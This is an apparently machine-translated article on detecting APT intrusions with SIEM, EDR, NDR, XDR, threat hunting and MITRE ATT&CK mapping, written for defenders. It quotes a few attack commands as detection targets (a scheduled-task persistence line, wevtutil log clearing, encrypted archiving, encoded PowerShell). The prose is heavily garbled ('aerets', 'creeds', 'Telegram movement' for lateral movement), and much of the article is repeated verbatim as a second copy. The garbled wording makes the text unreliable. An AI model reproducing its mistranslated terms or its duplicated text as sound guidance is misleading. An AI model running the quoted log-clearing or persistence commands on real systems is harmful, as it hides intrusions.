Business logic of APT: why the attacker stays in the network for months
Before dismantling detection tools, it is necessary to understand the motivation. APT-group is not an accidental hacker with ransomware-tuliki. For advanced threat threat is a long-term operation with a specific purpose: industrial espionage, preparation for sabotaging critical infrastructure or intellectual property theft. The financial impact goes far beyond direct losses.
The key difference between APT and mass campaigns is that at each stage of kill chain, attackers adapt to the victim’s specific infrastructure. They study which SIEM rules are customized, which EDR-agents stand on the hosts, where there are holes in network monitoring. According to IBM X-Force, in 2024, the growth of real-data attacks was 71% year-on-year. Attackers prefer not to hack, but to enter through the front door. Technique Valid Accounts (T1078) covers four tactics of MITRE ATT&CK: Initial Access, Persistence, Privilege Escalation and Defense Evasion.
That is why Detection of APT attacks does not boil down to one product. We need a coordinated work of several layers - endpoint, network, identity - with a single correlation and proactive threat hunt.
Detailed analysis of motivation and tactics of modern APT-groups with AI-automation - in our guide: AI Ransomware 2026: the Tactics from the M-Trends and Arctic Wolf reports for the pentesters
SIEM to detect threats: why 4500 aerets per day paralyze SOC
SIEM is the central nervous node of SOC. Splunk Enterprise Security, Microsoft Sentinel, MaxPatrol SIEM - they all aggregate logs from dozens of sources and apply correlation rules to detect attack chains. The problem is not the lack of data, but in its volume: a typical corporate SIEM generates more than 4500 alerts daily. To clean this up manually is the path to burnout by analysts and missed incidents.
What SIEM sees and what doesn't
SIEM is good for detecting by known patterns: mass input from one account to different hosts (Lateral Movement), creating a planning planner with a suspicious way (schtasks /create /tn Update /tr C:\ProgramData\update.ps1), cleaning the journals of events through wevtutil cl Security or Clear-EventLog (T1070.001) Correlation of Windows Security Event ID 4624 (successful input) + Event ID 4698 (shator creation) + outgoing connection to a newly registered domain - the basic detection scenario of the screen persist + C2-channel.
The Blind SIEM zone is attacks that do not generate characteristic logs. If the attacker uses Powershell.exe (T1059.001) with obfuscation (T1027) and connects to the legitimate cloud service (Google Sheets, OneDrive) instead of a dedicated C2-server, the standard correlation rules will not work. For such scenarios, custom Sigma rules are needed, tied to specific cloud APIs.
Checklist: 5 signs that your SIEM does not detect APT
1. There are no correlation rules for the living-off-the-land technician (PowerShell, WMI, MSHTA)
2. DNS logs do not correlate with Threat Intelligence feeds (MISP, OpenCTI)
3. There is no monitoring of accesses to cloud APIs (OneDrive, Google Drive, Slack) for C2 communications
4. The rules are triggered only on IOC (hashes, IP), but not on IOA (behavioral anomalies)
5. No automatic enrichment of alerts context from EDR-telemetry
If you scored 3+ points, your SIEM is actually blind to targeted attacks. It's time to rewrite the rules.
Detailed Sigma-rules for detecting cloud C2 channels: APT Detecting Through Cloud C2 Channels: Sigma and YARA Rules for Google Sheets, OneDrive and Slack
Sigma detectives for network equipment, including an ethyl-conveal via NETCONF: Sigma Detection Rules Cisco SD-WAN
EDR protection against APT: endpoint telemetry as the foundation of detection
EDR (Crowd Strike Falcon, SentinelOne Singularity, Elastic Security) is the first detection line at the endpoint level. The agent on the host records the start of processes, network connections, file modifications and registry, DLL boot. This telemetry is critical for detecting techniques that SIEM simply won’t see: Process Injection (T1055), OS Credential Dumping (T1003), disconnection of protective equipment (T1562.001)
Vendor-specific: where the detector breaks
Not all EDRs are the same – and it’s not marketing, but an architectural reality.
The architecture of telemetry collection determines what EDR techniques see. Agents based on user-mode hooks are vulnerable to bypass through direct/indirect syscals. Agents with kernel-level ETW-TI (CrowdStrike, Elastic 8.x+) detect these bypasses, but have restrictions on Linux hosts, where eBPF-based monitoring does not cover all system calls. I saw situations where an eBPF agent was missing a whole class of syscals on old cores - and in the megows of silence, while the attacker quietly gets the creeds.
Detailed analysis of the architecture of Linux-agents with a map of blind zones: Linux EDR from the inside: how agents collect telemetry and where they have blind spots
Restrictions of EDR, which are rarely discussed
EDR does not see network traffic between hosts that do not have an agent (printers, IoT, network equipment). EDR does not detect DNS tunneling - this requires NDR. EDR is powerless if the attacker uses exclusively valid credentials and standard administration tools without triggering suspicious processes.
EDR - necessary, but not sufficient layer. One.
NDR and Network Threat Detection: What Only Traffic Sees
Network Detection and Response closes the fundamental gap: everything that passes through the network, but leaves no traces on endpoints. NDR solutions (Darktrace, Vectra AI, PT Network Attack Discovery) analyze network traffic in real time, revealing anomalies by behavioral analysis and machine learning methods.
3 scenarios where NDRs are indispensable
Scenario 1: C2 through Application Layer Protocol (T1071). The attacker masks command traffic under HTTPS appeals to legitimate services. EDR only sees the process that initiated the connection. NDR analyzes the traffic pattern: the frequency of bacon intervals, the volume of data transmitted, JA3/JA4 TLS-find prints. Abnormal beacon with an interval of 60 seconds to the IP in ANS, not related to the stated service, is a classic NDR detect.
Scenario 2: Lateral Movement via SMB/RDP without malvarium. The attacker uses PsExec or standard RDP with stolen creeds, EDR on a target host may not see anomalies - legitimate processes. NDR fixes an uncharacteristic pattern: the accountant's workpaper is connected via SMB to the domain controller at 3:00, transmitting 2 GB of data. The accountant at three nights downloads 2 giga with DC - here and without ML it is clear that something is wrong.
Scenario 3: Extilting through DNS tunnels. The data is encoded in the subdomains of requests to a controlled attacking domain. On the host, it looks like regular DNS queries. NDR detects an anomaly: thousands of requests for subdomains with randomized names, high entropy of rows, an uncharacteristic volume of DNS traffic from one host.
Exotic exfiltration channels go beyond the network - a detailed analysis of stagnographic techniques: Steganography in audio files: how the nuqar is hidden inside WAV and how to detect it
SIEM EDR NDR integration: why XDR is not marketing, but a necessity
Isolated tools generate a fragmented picture. SIEM sees the logs, EDR - processes on hosts, NDR - network anomalies. The real chain of APT attacks goes through all three layers at the same time, and the correlation between them is the only way to distinguish true positive from noise.
Example of end-to-end correlation
Here’s what the APT operation detects when all three layers work together:
1. NDR detects an anomalous HTTPS-beacon to IP in AS owned by a bulletproof host, with a frequency of 45 seconds
2. EDR (Crowd Strike Falcon) on the original host shows: powershell.exeLaunched with -EncodedCommand, parental process - winword.exe(phishing document)
3. SIEM (Splunk) correlates: 10 minutes before the launch of PowerShell, the mail gateway recorded an incoming letter with an attachment. XLSM from a newly registered domain
4. SIEM enriches the event with data from MISP: the sender domain coincides with the IOC from the recent TI-report
5. Automatic reaction : host insulation via EDR API, IP locking on perimeter firewall
Without a bundle of three layers, each individual altrate is a low-priority: “suspicious PowerShell” (thousands per day), “unusual HTTPS traffic” (hundreds per day), “letter with a macro” (tenses per day). Together - a confirmed incident with a complete chain of attack.
XDR (Extended Detection and Response) formalizes this integration. CrowdStrike Falcon XDR, Microsoft Defender XDR, Palo Alto Cortex XDR combine telemetry from the end, network, identity, and cloud into a single data lake with cross-domain correlation. An open alternative is the Elastic Security + Zeek + Sigma stack, where the correlation is built on the Detection-as-Code approach. Cheaper, more flexible, but requires hands and heads.
Threat Hunting Methodology: 3 Approaches to Threat Hunting in 2026
Threat Hunting - Proactive Threat Search, already present in the infrastructure, but not detected by automated means. If SIEM and EDR answer the question “what is going to be late right now,” then Threat Hunting answers the question “what we’ve missed in the last 30 days.”
Unstructured Hunting: Intuition of Analyst
Exploratory search based on experience. The analyst notices an anomaly in the data and follows it. Example: unusually high volume of outgoing DNS traffic from one host during non-working hours. This does not coincide with any rule - but an experienced SOC analyst knows that DNS-tunneling looks like this. It is difficult to formalize this intuition in the rule, but it is she who catches what they miss the machines.
Situational Hunting: A Discussed In Context
Tied to a specific event: the publication of the new CVE, the report on the APT group campaign, the discovery of the IOC in the TI-Fed. The analyst takes the indicators from the report and checks whether they have met in historical SIEM/EDR data.
Tools for all three approaches: APT-Hunter (mapping of finds on MITRE AT&CK in Windows Event Logs), MISP/OpenCTI (IOC exchange and enrichment), Zeek (deep network traffic analysis), YARA (decreased cheating on signatures in files and memory), Sigma (universal detection format of detective rules, compile). Each of them is open-source, and everyone closes a specific niche of hunting in a page.
How ML-scoring transforms the triathement process - from thousands of aerets to dozens of priority cases: Machine learning in cybersecurity: how ML-scoring has reduced the SOC triage from thousands of aerates to tens
Identity-based attack and Valid Accounts: the main vector of 2026
IBM X-Force data is unambiguous: the growth of attacks using valid account data - 71% per year. This is not a trend. This is a fundamental shift in the tactics of APT groups. Why exploit vulnerabilities and risk EDR detail if you can buy stolen citral deposits in the shadow market and enter legitimately?
Valid Accounts Technique (T1078) - one of the most difficult for detection, because from the point of view of SIEM and EDR, the usual user enters. Detection is based on behavioral anomalies:
UEBA (User and Entity Behavior Analytics) is a key component for detection of activity-based attacks. Exabeam Fusion, for example, builds a normal behavior profile of each user and assigns risk score deviations. But UEBA is useless without high-quality basic data: the first 2-3 weeks after unfolding is the training period when the system generates false positives. Patience here is part of the process.
Complete analysis of identity-based techniques with Sigma-rules of detection: Identity-based attack: how attackers use legitimate accounts and how to detect them
Detection of the Telegram movement: 62 minutes to stop the attack
After the initial access, the APT group begins horizontal movement. According to CrowdStrike, the average time from initial access to the first lateral movement is 62 minutes. This is a window in which the SOC-command must detect and block the attacker. Missed - then it will only be more difficult.
Lateral movement is one of the most detectable phases of APT surgery if the tools are set up correctly. The attackers use PsExec, WMI, RDP, SMB – and each of these protocols leaves the characteristic artifacts.
Detection on kill chain position
Initial Access → Lateral Movement:
• Sysmon Event ID 3 (Network Connection) on the site host: outgoing connection to ports 445 (SMB), 135 (WMI), 3389 (RDP) to the host with which the workstation had not previously communicated
• Windows Security Event ID 4624 (LogonType 3 - Network) on target host: login with account that has not previously been used on this host
• NDR : SMB traffic spike from one source to several goals in a short interval - network scanning pattern
Lateral Movement → Data Collection:
• EDR : launch rar.exeor 7z.exewith encryption keys (-hp), the parental process - cmd.exe, launched through PsExec
• SIEM : correlation of data archive + abnormal outgoing traffic to external IP
79% of attacks in 2024 were without malware - the attackers moved exclusively through standard tools. Detection of the lateral movement through legitimate accounts requires behavioral analysis, not signature. The signatures are useless here.
Detailed guide with Sigma rules to detect horizontal movement without malicious code: Detecting lateral movement through trusted accounting: detecting horizontal movement without malicious code
Living off the Land and evasion techniques: why standard detects break down
Living off the Land (LotL) is the use of legitimate system tools for malicious activity. PowerShell.exe, certutil.exe, mshta.exe, wmic.exe All these are standard components of Windows that cannot simply be blocked in the corporate environment. Catalog LOLBAS (Living Off The Land Binaries and Scripts) contains dozens of such utilities with specific malicious use-cases. certutil.exe related to techniques T1027.013 (Encrypted/Encoded File), T1105 (Ingress Tool Transfer), T1140 (Deobfuscate/Decode Files or Information) and T1564.004 (NTFS File Attributes). mshta.exe - c T1105 and T1218.005 (Mshta). wmic.exe - c T1047 (Windows Management Instrumentation) and T1218 (System Binary Proxy Execution)
APT-groups combine LotL with evasion technicians:
• Obfuscated Files or Information (T1027): PowerShell scripts are encoded in Base64 or use rowing to bypass signature analysis
• Process Injection (T1055): the code is injected into a legitimate process (explorer.exe, svchost.exe), hiding malicious activity from EDR
• Disable or Modify Tools (T1562.001): the attacker disables or modifies the EDR agent, Sysmon or Windows Defender
A recent example: Microsoft Threat Intelligence in May 2026 published a technical analysis of Go-based ransomware "The Gentlemen", deployed by the affiliates of the group Storm-2697. The encrypter combines per-file ephemeral encryption with aggressive self-propagation through the standard Windows mechanisms. Pure LotL in action.
LotL Technique detector detector
1. Enable PowerShell (Module Logging, Script Block Logging, Transcription)
2. Configure Sysmon with SwiftOnSecurity or ION-Storm configuration to monitor LOLBAS binaries
3. Create a whitelist of legitimate use certutil.exe, mshta.exe, wmic.exeand alternate to deviations
4. Monitoring Event ID 4688 (Process Creation) with command-line arguments - an expanded audit policy is required
5. correlate launch of LOLBAS-binary + network connection to non-standard port = high priority
Honey Potechnologies and Deception: Force an Attacker to Reveal Himself
Deception-technology is the only class of tools where false positives are by definition impossible. If someone interacts with a trap, it's an attacker or insider. The third is not given. Honeypot servers, fake accounts, canary files create a minefield for an attacker that has already penetrated the perimeter.
The new generation honeypot - LLM bait, capable of imitating realistic services on all 65535 ports. The language model generates plausible responses to any protocol, holding the attacker and collecting TTP. This is radically different from the classic honeypot, which required a separate image for each simulated service. One LLM-hanipot instead of a zoo of dozens of images is a serious step forward.
Practical guide for the deployment of LLM-bait for SOC: LLM Honeypot: building bait based on the language model for monitoring all 65535 ports
MITRE ATT&CK as a threat hunt language: from matrix to detecting surface
MITRE ATT&CK is not an academic directory, but a working tool of SOC-analytics. Each technique in the matrix is a specific detective case: what data source is needed, what pattern to look for, which tools are detectable. The maturity of SOC is measured not by the number of aerates, but by the percentage of MITRE ATT&CK coating.
Matrix of maturity SOC
Key equipment for priority coverage based on threat pen reports 2024-2025:
• T1190 - Exploit Public-Facing Application (38% initial access by M-Trends)
• T1078 - Valid Accounts (71% growth in IBM X-Force)
• T1071 - Application Layer Protocol (C2 via HTTPS/DNS)
• T1003 - OS Credential Dumping (necessary for lateral movement)
• T1055 - Process Injection (main evasion-technique)
Each vendredor-workshop platform (CrowdStrike, SentinelOne, Elastic) declares the percentage of coverage of MITRE ATT&CK. But the declared coating and real detection are different things. Covering means that the platform can Collect telemetry for technology. Detection - what you have Consonant A rule that turns this telemetry into an altre. The difference between them is the work of your SOC engineer.
AI and ML in SOC: from 4500 alerts to dozens of priority cases
The generative AI transforms both sides of the conflict. According to IBM X-Force, the generation of phishing emails with the help of GenAI is 11.4 times faster with comparable quality. CrowdStrike captures the doubling of GenAI’s malicious use for social engineering in 2024. Attackers automate the reconnaissance phases and initial access.
SOC teams respond with ML-scoring alerts: the trial of the superintering identifies known patterns (in essence, improved signatures), unsupervised learning detects anomalies (zero-day behavior). Stellar Cyber Open XDR says a 50-60% reduction in the false positive rate through Multi-Layer AI. Practical result: L1 analyst does not receive 4,500 “raw” alerts, but 30-50 prioritized cases with a context.
But AI-scoping does not replace analytics. The organizational context is that the ML is not able to take into account. PowerShell-script at 2:00 am on the host of IT-administrator - normal work. The same script on the host of a marketer is a red flag. This context is known only to a person working with a specific infrastructure.
Detailed analysis of ML-approaches in SOC with real metrics: Machine Learning in Cybersecurity: How ML-scoring Reduces SOC Triplet
Practical stack: what to expand depending on the maturity of SOC
The choice of tools depends on the budget, the size of the team and the current level of maturity. There is no universal stack - there is a decision tree.
Stack by command size
When to buy MDR instead of hiring
Managed Detection and Response (MDR) - outsourcing and response - is economically justified if the cost of hiring and retaining L2-L3 analysts exceeds the value of the MDR service. For a team of 1-3 people, the MDR provider (UnderDefense, CrowdStrike OverWatch, Arctic Wolf) closes night shifts and gives access to expertise that cannot be hired on the market.
MDR Limit: The provider does not know your infrastructure like the internal command. The first 30 days is the onboarding period when the number of false escalations will be high. You have to be prepared for that.
Data sources for APT detection: what to collect and why
Detecting targeted attacks does not start with tools, but with data sources. If SIEM does not receive the right lairs, no correlation rules will not help.
Key Logging Required by OWASP A09:2021 (Security Logging and Monitoring Failures): without logging and monitoring, compromise cannot be detected. Audited events are obliged to be logged, warnings are to be generated, and logs are analyzed. Violation of any of these conditions creates a blind zone for APT.
Where the APT detection is going in 2026-2027
Three trends will determine APT detection in the coming year.
The AI-native detection will replace AI-assisted. The difference is fundamental: AI-assisted - ML complements the existing rules. AI-native - ML is the main engine of detection, and the rules are used for validation. Next-generation platforms will build attack storylines automatically, correlated endpoint, network, and identity telemetry through GraphML without manual setting the rules.
Detection-as-Code will be the standard. Sigma-rules, versioned in Git, tested through CI / CD, deposited on any SIEM - this approach is already used by mature SOC teams. In 2026-2027, it will become a basic requirement. The Sigma + YARA + Osquery bundle gives a portable detection stack independent of the vendor.
Identity-centric security will replace perimeter-centric. With 79% of attacks without malware and 71% growth in credential-based attacks, the detection focus shifts from “what is running on the host” to “who does what and why it’s abnormal.” UEBA, behavioral analysis, continuous authentication - not options, but mandatory components of the SOC-sewage.
Most SOC teams I have watched in recent years make the same mistake: they buy tools, not build a process. The organization puts CrowdStrike on endpoints, connects Splunk, deploys NDR - and believes that it is protected from APT. After six months, it turns out that the EDR agent is worth 80% hosts (the remaining 20% is Linux servers that were “forgotten” to roll), the SIEM-rule is default, and no one understands NDR-allerators, because the L1 analyst does not understand what it means “anomalous beacon pattern”.
Tools are multipliers. Multiply them by zero process - get zero detection. I saw an SOC of two people with Elastic and well-written Sigma rules that caught the lateral movement in 15 minutes. And I saw a SOC of twenty people with an enterprise-glass for millions of dollars, where Cobatt Strike beacon lived online for a month because the alter that drowned in the stream of four thousand daily false positive.
In the next two years, there will be a strict polarization. The teams that invest in Detection Engineering – writing, testing and iterating the definition rules as code – will catch APT in the early stages of kill chain. Teams that continue to rely on vendor default and marketing promises of “AI-powered detection” will learn about compromise from the news. The AI-native SOC platform market is growing, but the technology will not replace an engineer who understands why a specific PowerShell script on a particular host at a specific time is a red flag, not standard automation. The choice between these two ways each team makes today - not when attacking is already inside.
Before dismantling detection tools, it is necessary to understand the motivation. APT-group is not an accidental hacker with ransomware-tuliki. For advanced threat threat is a long-term operation with a specific purpose: industrial espionage, preparation for sabotaging critical infrastructure or intellectual property theft. The financial impact goes far beyond direct losses.
The key difference between APT and mass campaigns is that at each stage of kill chain, attackers adapt to the victim’s specific infrastructure. They study which SIEM rules are customized, which EDR-agents stand on the hosts, where there are holes in network monitoring. According to IBM X-Force, in 2024, the growth of real-data attacks was 71% year-on-year. Attackers prefer not to hack, but to enter through the front door. Technique Valid Accounts (T1078) covers four tactics of MITRE ATT&CK: Initial Access, Persistence, Privilege Escalation and Defense Evasion.
That is why Detection of APT attacks does not boil down to one product. We need a coordinated work of several layers - endpoint, network, identity - with a single correlation and proactive threat hunt.
Detailed analysis of motivation and tactics of modern APT-groups with AI-automation - in our guide: AI Ransomware 2026: the Tactics from the M-Trends and Arctic Wolf reports for the pentesters
SIEM to detect threats: why 4500 aerets per day paralyze SOC
SIEM is the central nervous node of SOC. Splunk Enterprise Security, Microsoft Sentinel, MaxPatrol SIEM - they all aggregate logs from dozens of sources and apply correlation rules to detect attack chains. The problem is not the lack of data, but in its volume: a typical corporate SIEM generates more than 4500 alerts daily. To clean this up manually is the path to burnout by analysts and missed incidents.
What SIEM sees and what doesn't
SIEM is good for detecting by known patterns: mass input from one account to different hosts (Lateral Movement), creating a planning planner with a suspicious way (schtasks /create /tn Update /tr C:\ProgramData\update.ps1), cleaning the journals of events through wevtutil cl Security or Clear-EventLog (T1070.001) Correlation of Windows Security Event ID 4624 (successful input) + Event ID 4698 (shator creation) + outgoing connection to a newly registered domain - the basic detection scenario of the screen persist + C2-channel.
The Blind SIEM zone is attacks that do not generate characteristic logs. If the attacker uses Powershell.exe (T1059.001) with obfuscation (T1027) and connects to the legitimate cloud service (Google Sheets, OneDrive) instead of a dedicated C2-server, the standard correlation rules will not work. For such scenarios, custom Sigma rules are needed, tied to specific cloud APIs.
Checklist: 5 signs that your SIEM does not detect APT
1. There are no correlation rules for the living-off-the-land technician (PowerShell, WMI, MSHTA)
2. DNS logs do not correlate with Threat Intelligence feeds (MISP, OpenCTI)
3. There is no monitoring of accesses to cloud APIs (OneDrive, Google Drive, Slack) for C2 communications
4. The rules are triggered only on IOC (hashes, IP), but not on IOA (behavioral anomalies)
5. No automatic enrichment of alerts context from EDR-telemetry
If you scored 3+ points, your SIEM is actually blind to targeted attacks. It's time to rewrite the rules.
Detailed Sigma-rules for detecting cloud C2 channels: APT Detecting Through Cloud C2 Channels: Sigma and YARA Rules for Google Sheets, OneDrive and Slack
Sigma detectives for network equipment, including an ethyl-conveal via NETCONF: Sigma Detection Rules Cisco SD-WAN
EDR protection against APT: endpoint telemetry as the foundation of detection
EDR (Crowd Strike Falcon, SentinelOne Singularity, Elastic Security) is the first detection line at the endpoint level. The agent on the host records the start of processes, network connections, file modifications and registry, DLL boot. This telemetry is critical for detecting techniques that SIEM simply won’t see: Process Injection (T1055), OS Credential Dumping (T1003), disconnection of protective equipment (T1562.001)
Vendor-specific: where the detector breaks
Not all EDRs are the same – and it’s not marketing, but an architectural reality.
The architecture of telemetry collection determines what EDR techniques see. Agents based on user-mode hooks are vulnerable to bypass through direct/indirect syscals. Agents with kernel-level ETW-TI (CrowdStrike, Elastic 8.x+) detect these bypasses, but have restrictions on Linux hosts, where eBPF-based monitoring does not cover all system calls. I saw situations where an eBPF agent was missing a whole class of syscals on old cores - and in the megows of silence, while the attacker quietly gets the creeds.
Detailed analysis of the architecture of Linux-agents with a map of blind zones: Linux EDR from the inside: how agents collect telemetry and where they have blind spots
Restrictions of EDR, which are rarely discussed
EDR does not see network traffic between hosts that do not have an agent (printers, IoT, network equipment). EDR does not detect DNS tunneling - this requires NDR. EDR is powerless if the attacker uses exclusively valid credentials and standard administration tools without triggering suspicious processes.
EDR - necessary, but not sufficient layer. One.
NDR and Network Threat Detection: What Only Traffic Sees
Network Detection and Response closes the fundamental gap: everything that passes through the network, but leaves no traces on endpoints. NDR solutions (Darktrace, Vectra AI, PT Network Attack Discovery) analyze network traffic in real time, revealing anomalies by behavioral analysis and machine learning methods.
3 scenarios where NDRs are indispensable
Scenario 1: C2 through Application Layer Protocol (T1071). The attacker masks command traffic under HTTPS appeals to legitimate services. EDR only sees the process that initiated the connection. NDR analyzes the traffic pattern: the frequency of bacon intervals, the volume of data transmitted, JA3/JA4 TLS-find prints. Abnormal beacon with an interval of 60 seconds to the IP in ANS, not related to the stated service, is a classic NDR detect.
Scenario 2: Lateral Movement via SMB/RDP without malvarium. The attacker uses PsExec or standard RDP with stolen creeds, EDR on a target host may not see anomalies - legitimate processes. NDR fixes an uncharacteristic pattern: the accountant's workpaper is connected via SMB to the domain controller at 3:00, transmitting 2 GB of data. The accountant at three nights downloads 2 giga with DC - here and without ML it is clear that something is wrong.
Scenario 3: Extilting through DNS tunnels. The data is encoded in the subdomains of requests to a controlled attacking domain. On the host, it looks like regular DNS queries. NDR detects an anomaly: thousands of requests for subdomains with randomized names, high entropy of rows, an uncharacteristic volume of DNS traffic from one host.
Exotic exfiltration channels go beyond the network - a detailed analysis of stagnographic techniques: Steganography in audio files: how the nuqar is hidden inside WAV and how to detect it
SIEM EDR NDR integration: why XDR is not marketing, but a necessity
Isolated tools generate a fragmented picture. SIEM sees the logs, EDR - processes on hosts, NDR - network anomalies. The real chain of APT attacks goes through all three layers at the same time, and the correlation between them is the only way to distinguish true positive from noise.
Example of end-to-end correlation
Here’s what the APT operation detects when all three layers work together:
1. NDR detects an anomalous HTTPS-beacon to IP in AS owned by a bulletproof host, with a frequency of 45 seconds
2. EDR (Crowd Strike Falcon) on the original host shows: powershell.exeLaunched with -EncodedCommand, parental process - winword.exe(phishing document)
3. SIEM (Splunk) correlates: 10 minutes before the launch of PowerShell, the mail gateway recorded an incoming letter with an attachment. XLSM from a newly registered domain
4. SIEM enriches the event with data from MISP: the sender domain coincides with the IOC from the recent TI-report
5. Automatic reaction : host insulation via EDR API, IP locking on perimeter firewall
Without a bundle of three layers, each individual altrate is a low-priority: “suspicious PowerShell” (thousands per day), “unusual HTTPS traffic” (hundreds per day), “letter with a macro” (tenses per day). Together - a confirmed incident with a complete chain of attack.
XDR (Extended Detection and Response) formalizes this integration. CrowdStrike Falcon XDR, Microsoft Defender XDR, Palo Alto Cortex XDR combine telemetry from the end, network, identity, and cloud into a single data lake with cross-domain correlation. An open alternative is the Elastic Security + Zeek + Sigma stack, where the correlation is built on the Detection-as-Code approach. Cheaper, more flexible, but requires hands and heads.
Threat Hunting Methodology: 3 Approaches to Threat Hunting in 2026
Threat Hunting - Proactive Threat Search, already present in the infrastructure, but not detected by automated means. If SIEM and EDR answer the question “what is going to be late right now,” then Threat Hunting answers the question “what we’ve missed in the last 30 days.”
Unstructured Hunting: Intuition of Analyst
Exploratory search based on experience. The analyst notices an anomaly in the data and follows it. Example: unusually high volume of outgoing DNS traffic from one host during non-working hours. This does not coincide with any rule - but an experienced SOC analyst knows that DNS-tunneling looks like this. It is difficult to formalize this intuition in the rule, but it is she who catches what they miss the machines.
Situational Hunting: A Discussed In Context
Tied to a specific event: the publication of the new CVE, the report on the APT group campaign, the discovery of the IOC in the TI-Fed. The analyst takes the indicators from the report and checks whether they have met in historical SIEM/EDR data.
Tools for all three approaches: APT-Hunter (mapping of finds on MITRE AT&CK in Windows Event Logs), MISP/OpenCTI (IOC exchange and enrichment), Zeek (deep network traffic analysis), YARA (decreased cheating on signatures in files and memory), Sigma (universal detection format of detective rules, compile). Each of them is open-source, and everyone closes a specific niche of hunting in a page.
How ML-scoring transforms the triathement process - from thousands of aerets to dozens of priority cases: Machine learning in cybersecurity: how ML-scoring has reduced the SOC triage from thousands of aerates to tens
Identity-based attack and Valid Accounts: the main vector of 2026
IBM X-Force data is unambiguous: the growth of attacks using valid account data - 71% per year. This is not a trend. This is a fundamental shift in the tactics of APT groups. Why exploit vulnerabilities and risk EDR detail if you can buy stolen citral deposits in the shadow market and enter legitimately?
Valid Accounts Technique (T1078) - one of the most difficult for detection, because from the point of view of SIEM and EDR, the usual user enters. Detection is based on behavioral anomalies:
UEBA (User and Entity Behavior Analytics) is a key component for detection of activity-based attacks. Exabeam Fusion, for example, builds a normal behavior profile of each user and assigns risk score deviations. But UEBA is useless without high-quality basic data: the first 2-3 weeks after unfolding is the training period when the system generates false positives. Patience here is part of the process.
Complete analysis of identity-based techniques with Sigma-rules of detection: Identity-based attack: how attackers use legitimate accounts and how to detect them
Detection of the Telegram movement: 62 minutes to stop the attack
After the initial access, the APT group begins horizontal movement. According to CrowdStrike, the average time from initial access to the first lateral movement is 62 minutes. This is a window in which the SOC-command must detect and block the attacker. Missed - then it will only be more difficult.
Lateral movement is one of the most detectable phases of APT surgery if the tools are set up correctly. The attackers use PsExec, WMI, RDP, SMB – and each of these protocols leaves the characteristic artifacts.
Detection on kill chain position
Initial Access → Lateral Movement:
• Sysmon Event ID 3 (Network Connection) on the site host: outgoing connection to ports 445 (SMB), 135 (WMI), 3389 (RDP) to the host with which the workstation had not previously communicated
• Windows Security Event ID 4624 (LogonType 3 - Network) on target host: login with account that has not previously been used on this host
• NDR : SMB traffic spike from one source to several goals in a short interval - network scanning pattern
Lateral Movement → Data Collection:
• EDR : launch rar.exeor 7z.exewith encryption keys (-hp), the parental process - cmd.exe, launched through PsExec
• SIEM : correlation of data archive + abnormal outgoing traffic to external IP
79% of attacks in 2024 were without malware - the attackers moved exclusively through standard tools. Detection of the lateral movement through legitimate accounts requires behavioral analysis, not signature. The signatures are useless here.
Detailed guide with Sigma rules to detect horizontal movement without malicious code: Detecting lateral movement through trusted accounting: detecting horizontal movement without malicious code
Living off the Land and evasion techniques: why standard detects break down
Living off the Land (LotL) is the use of legitimate system tools for malicious activity. PowerShell.exe, certutil.exe, mshta.exe, wmic.exe All these are standard components of Windows that cannot simply be blocked in the corporate environment. Catalog LOLBAS (Living Off The Land Binaries and Scripts) contains dozens of such utilities with specific malicious use-cases. certutil.exe related to techniques T1027.013 (Encrypted/Encoded File), T1105 (Ingress Tool Transfer), T1140 (Deobfuscate/Decode Files or Information) and T1564.004 (NTFS File Attributes). mshta.exe - c T1105 and T1218.005 (Mshta). wmic.exe - c T1047 (Windows Management Instrumentation) and T1218 (System Binary Proxy Execution)
APT-groups combine LotL with evasion technicians:
• Obfuscated Files or Information (T1027): PowerShell scripts are encoded in Base64 or use rowing to bypass signature analysis
• Process Injection (T1055): the code is injected into a legitimate process (explorer.exe, svchost.exe), hiding malicious activity from EDR
• Disable or Modify Tools (T1562.001): the attacker disables or modifies the EDR agent, Sysmon or Windows Defender
A recent example: Microsoft Threat Intelligence in May 2026 published a technical analysis of Go-based ransomware "The Gentlemen", deployed by the affiliates of the group Storm-2697. The encrypter combines per-file ephemeral encryption with aggressive self-propagation through the standard Windows mechanisms. Pure LotL in action.
LotL Technique detector detector
1. Enable PowerShell (Module Logging, Script Block Logging, Transcription)
2. Configure Sysmon with SwiftOnSecurity or ION-Storm configuration to monitor LOLBAS binaries
3. Create a whitelist of legitimate use certutil.exe, mshta.exe, wmic.exeand alternate to deviations
4. Monitoring Event ID 4688 (Process Creation) with command-line arguments - an expanded audit policy is required
5. correlate launch of LOLBAS-binary + network connection to non-standard port = high priority
Honey Potechnologies and Deception: Force an Attacker to Reveal Himself
Deception-technology is the only class of tools where false positives are by definition impossible. If someone interacts with a trap, it's an attacker or insider. The third is not given. Honeypot servers, fake accounts, canary files create a minefield for an attacker that has already penetrated the perimeter.
The new generation honeypot - LLM bait, capable of imitating realistic services on all 65535 ports. The language model generates plausible responses to any protocol, holding the attacker and collecting TTP. This is radically different from the classic honeypot, which required a separate image for each simulated service. One LLM-hanipot instead of a zoo of dozens of images is a serious step forward.
Practical guide for the deployment of LLM-bait for SOC: LLM Honeypot: building bait based on the language model for monitoring all 65535 ports
MITRE ATT&CK as a threat hunt language: from matrix to detecting surface
MITRE ATT&CK is not an academic directory, but a working tool of SOC-analytics. Each technique in the matrix is a specific detective case: what data source is needed, what pattern to look for, which tools are detectable. The maturity of SOC is measured not by the number of aerates, but by the percentage of MITRE ATT&CK coating.
Matrix of maturity SOC
Key equipment for priority coverage based on threat pen reports 2024-2025:
• T1190 - Exploit Public-Facing Application (38% initial access by M-Trends)
• T1078 - Valid Accounts (71% growth in IBM X-Force)
• T1071 - Application Layer Protocol (C2 via HTTPS/DNS)
• T1003 - OS Credential Dumping (necessary for lateral movement)
• T1055 - Process Injection (main evasion-technique)
Each vendredor-workshop platform (CrowdStrike, SentinelOne, Elastic) declares the percentage of coverage of MITRE ATT&CK. But the declared coating and real detection are different things. Covering means that the platform can Collect telemetry for technology. Detection - what you have Consonant A rule that turns this telemetry into an altre. The difference between them is the work of your SOC engineer.
AI and ML in SOC: from 4500 alerts to dozens of priority cases
The generative AI transforms both sides of the conflict. According to IBM X-Force, the generation of phishing emails with the help of GenAI is 11.4 times faster with comparable quality. CrowdStrike captures the doubling of GenAI’s malicious use for social engineering in 2024. Attackers automate the reconnaissance phases and initial access.
SOC teams respond with ML-scoring alerts: the trial of the superintering identifies known patterns (in essence, improved signatures), unsupervised learning detects anomalies (zero-day behavior). Stellar Cyber Open XDR says a 50-60% reduction in the false positive rate through Multi-Layer AI. Practical result: L1 analyst does not receive 4,500 “raw” alerts, but 30-50 prioritized cases with a context.
